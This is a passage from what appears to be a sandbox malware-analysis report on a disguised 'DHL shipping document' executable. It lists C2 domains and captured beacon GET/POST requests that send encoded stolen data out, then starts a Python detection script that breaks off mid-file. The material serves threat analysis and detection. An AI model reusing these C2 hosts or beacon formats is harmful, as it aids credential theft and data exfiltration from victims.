73 20 74 68 65 20 76 6f 69 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 50 6f 77 65 72 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 65 72 6c 64 61 6e 63 65 72 2e 6f 72 67 2f 22 3e 44 61 6e 63 65 72 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Error 404</title><link rel="stylesheet" href="/css/error.css" /><meta http-equiv="Content-type" 
content="text/html; charset=UTF-8" /></head><body><h1>Error 404</h1><div id="content"><h2>Page Not Found</h2><p>Sorry, this is the void.</p></div><div id="footer">Powered by <a href="http://perldancer.org/">Dancer</a></div></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:28:37 GMTContent-Type: text/htmlContent-Length: 498Connection: closeLast-Modified: Mon, 01 Dec 2014 15:11:20 GMTChimera-API-Server: api3.uk.chimera.uk2group.comX-Powered-By: Perl Dancer 1.3513Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 3c 70 3e 53 6f 72 72 79 2c 20 74 68 69 73 20 69 73 20 74 68 65 20 76 6f 69 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 50 6f 77 65 72 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 65 72 6c 64 61 6e 63 65 72 2e 6f 72 67 2f 22 3e 44 61 6e 63 65 72 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Error 404</title><link rel="stylesheet" 
href="/css/error.css" /><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /></head><body><h1>Error 404</h1><div id="content"><h2>Page Not Found</h2><p>Sorry, this is the void.</p></div><div id="footer">Powered by <a href="http://perldancer.org/">Dancer</a></div></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 10:28:40 GMTConnection: closeContent-Length: 1826Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e6 97 a0 e6 b3 95 e6 89 be e5 88 b0 e8 b5 84 e6 ba 90 e3 80 82 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <title></title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 10:28:43 GMTConnection: closeContent-Length: 1826Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e6 97 a0 e6 b3 95 e6 89 be e5 88 b0 e8 b5 84 e6 ba 90 e3 80 82 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <title></title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font
Source: help.exe, 00000005.00000002.582591092.00000000036E8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v
Source: DHL_SHIPPING_DOCUMENT.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: help.exe, 00000005.00000002.582591092.0000000003D30000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://perldancer.org/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.363ww.top
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.363ww.top/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.363ww.topwww.rw-bau.comF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afzalhossainantor.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afzalhossainantor.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afzalhossainantor.comwww.staatslieden.bizF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.espisys-technology.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.espisys-technology.com/d2a3/
Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.espisys-technology.comwww.on-smooth.comF7L99l=8qpwJ)
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.fresnocap.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.fresnocap.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.fresnocap.comwww.vanguardfsm.comF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.getpay.life
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.getpay.life/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.luxgudonu.store
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.luxgudonu.store/d2a3/
Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.luxgudonu.storewww.sowmedia.siteF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.motherhoodinthegarden.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.motherhoodinthegarden.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.on-smooth.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.on-smooth.com/d2a3/
Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.on-smooth.comwww.luxgudonu.storeF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rw-bau.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rw-bau.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rw-bau.comwww.worldhortihealth.comF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sowmedia.site
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sowmedia.site/d2a3/
Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sowmedia.sitewww.yh78898.comF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.staatslieden.biz
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.staatslieden.biz/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.staatslieden.bizwww.fresnocap.comF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.vanguardfsm.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.vanguardfsm.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.vanguardfsm.comwww.xefordbienhoa.comF7L99l=8qpwJr
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.versicherungsgott.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.versicherungsgott.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.worldhortihealth.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.worldhortihealth.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.worldhortihealth.comwww.afzalhossainantor.comF7L99l=8qpwJ
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.xefordbienhoa.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.xefordbienhoa.com/d2a3/
Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yh78898.com
Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yh78898.com/d2a3/
Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yh78898.comwww.363ww.topF7L99l=8qpwJ
Source: 35-7052c.5.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 35-7052c.5.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 35-7052c.5.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 35-7052c.5.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /d2a3/ HTTP/1.1Host: www.motherhoodinthegarden.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.motherhoodinthegarden.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.motherhoodinthegarden.com/d2a3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 77 3d 52 50 52 67 48 34 38 6e 43 63 44 72 51 57 37 78 32 56 34 7a 42 72 67 44 64 38 49 50 6e 38 76 6f 64 73 6f 58 51 78 4b 31 59 4b 66 4d 35 7a 6e 72 59 4d 78 73 76 48 33 4d 57 79 7a 71 4f 73 38 68 53 6c 50 6b 43 37 73 48 61 6c 33 64 52 4a 61 49 55 74 48 45 77 42 30 64 45 57 55 47 65 6f 4a 4e 45 31 6e 4e 54 76 37 4c 76 51 4d 56 4e 5f 61 4c 49 47 62 36 39 54 61 42 67 30 39 53 57 70 77 6a 63 39 73 53 78 69 4e 63 75 5a 67 70 66 58 6f 4e 74 75 34 38 6b 37 52 6f 46 4b 7a 32 6d 63 36 72 59 4f 68 6c 31 76 75 6c 69 48 75 4b 41 73 35 69 34 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mw=RPRgH48nCcDrQW7x2V4zBrgDd8IPn8vodsoXQxK1YKfM5znrYMxsvH3MWyzqOs8hSlPkC7sHal3dRJaIUtHEwB0dEWUGeoJNE1nNTv7LvQMVN_aLIGb69TaBg09SWpwjc9sSxiNcuZgpfXoNtu48k7RoFKz2mc6rYOhl1vuliHuKAs5i4g).
Source: unknown DNS traffic detected: queries for: www.versicherungsgott.com
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ== HTTP/1.1Host: www.versicherungsgott.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJ HTTP/1.1Host: www.motherhoodinthegarden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=VQWJd0zbMmoZh8qz35kMD56sFoyc6gTYso/MZ3BJ/Q0NuTQy4/HeuFqYJgzXZamkeMaLAEsOyVyJpFsiRVW3jp2QSfHijAqmyw== HTTP/1.1Host: www.getpay.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=HRt8t1hC6ylxzqu69JiO+2+wCg/IpDjUJ4ODvXLX3JGoHCx8OnZPShMSZXcaT/6Kc192JGOxG+z3HQLrZrJeLIMi1PhqwEBrHA==&F7L99l=8qpwJ HTTP/1.1Host: www.espisys-technology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=LnB6L7dnOzftoEr5UpUEPAqnd7gAmYo0E1h8Hr8XDrTV/RCVTRWGXzxgMAjKYD2ZiMi0DXBclY2V/N6w7Ub5K9/YRO3kcEW/Xg== HTTP/1.1Host: www.on-smooth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=OjO/noXVMTk40sLqqWNUhETz5fwNQfL3iZv4zuTHX4FsBRg0F7vbWW3nqcxNlOGl4ZCA660VFsqTMG20zBTe2NhxC9mrQabZ6Q==&F7L99l=8qpwJ HTTP/1.1Host: www.luxgudonu.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDnv4xxMA9hLjSw== HTTP/1.1Host: www.sowmedia.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=/rn7tSorYChcOKKpyJYvjsebDE1EetOtUlfXV6ATVt8jMTNnk8PtnAR6Iam3VdBxJXQPah1uBiYgzGnhkXQp6MgBOVaGh7iMCA==&F7L99l=8qpwJ HTTP/1.1Host: www.yh78898.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405809
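The beacons logged above share one shape: a GET to a short /d2a3/ path whose query is a fixed marker pair (F7L99l=8qpwJ) plus a roughly 100-character base64 blob, sent with Connection: close and no User-Agent; a form POST to the same path whose Origin and Referer simply echo the Host; and, in explorer.exe memory, the decrypted C2 list surfacing as two adjacent hosts run together with that marker. The script below is an added example written for this page, not code from the sandbox, the analyst or the malware. The request samples are transcribed from the entries above with the CRLF header separators restored, the benign control request is constructed, and the path and length thresholds are assumptions drawn from this single sample rather than FormBook constants.

```python
"""Added example for this report page (not the sandbox's or the sample's code).
Flags the beacon shape logged above and recovers the C2 host list from the
run-together config strings found in explorer.exe. Request samples are
transcribed from the report; thresholds are assumptions based on this sample."""
import re
from urllib.parse import urlsplit

# Fixed query pair seen in every beacon and config string of this sample.
# Treat it as an IOC for this build, not as a FormBook constant.
MARKER = "F7L99l=8qpwJ"
PATH_RE = re.compile(r"^/[a-z0-9]{2,8}/$")            # e.g. "/d2a3/"
B64_RE = re.compile(r"^[A-Za-z0-9+/_-]{40,}={0,2}$")   # the long "Mw=" blob

# Transcribed from the report, one header per line again.
BEACON_GET = (
    "GET /d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8"
    "puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ== HTTP/1.1\r\n"
    "Host: www.versicherungsgott.com\r\nConnection: close\r\n\r\n"
)
BEACON_POST = (
    "POST /d2a3/ HTTP/1.1\r\nHost: www.motherhoodinthegarden.com\r\n"
    "Connection: close\r\nContent-Length: 184\r\nCache-Control: no-cache\r\n"
    "Origin: http://www.motherhoodinthegarden.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
    "Referer: http://www.motherhoodinthegarden.com/d2a3/\r\n"
    "Accept-Language: en-US\r\nAccept-Encoding: gzip, deflate\r\n\r\n"
    "Mw=RPRgH48nCcDrQW7x2V4zBrgDd8IPn8vodsoXQxK1YKfM5znrYMxsvH3MWyzqOs8hSlPk"
    "C7sHal3dRJaIUtHEwB0dEWUGeoJNE1nNTv7LvQMVN_aLIGb69TaBg09SWpwjc9sSxiNcuZgp"
    "fXoNtu48k7RoFKz2mc6rYOhl1vuliHuKAs5i4g)."
)
# Constructed control request, not from the report.
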